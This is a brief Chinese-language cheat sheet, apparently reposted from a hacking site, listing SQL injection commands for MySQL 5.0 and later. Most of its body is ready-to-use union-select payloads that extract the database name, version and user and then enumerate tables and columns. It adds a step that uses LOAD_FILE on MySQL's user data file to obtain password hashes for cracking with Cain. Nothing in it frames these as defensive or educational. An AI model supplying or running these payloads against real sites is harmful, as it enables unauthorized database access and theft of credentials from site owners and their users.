MYSQL5.0以上版本注入命令 -www.hackerschina.org

2024-07-03 08:50:58 216人阅读

一.查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,database(),5,version(),6,user(),7..../*

二.暴表
and 1=2 union select 1,2,3,TABLE_NAME,4,5,6,7...... from information_schema.TABLES where TABLE_SCHEMA =库的HEX limit 1,1/*

三.暴字段
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7.....from information_schema.COLUMNS where TABLE_NAME=表的HEX limit 1,1/*

关于找不到ROOT密码的爆破:
通过LOAD_FILE(‘‘C:\..\MYSQL\DATA\MYSQL\USER.MYD‘‘)得到用户的HASH散列,之后用CAIN爆破....

声明：以上内容来自用户投稿及互联网公开渠道收集整理发布，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任，若内容有误或涉及侵权可进行投诉：投诉/举报工作人员会在5个工作日内联系你，一经查实，本站将立刻删除涉嫌侵权内容。

联系
我们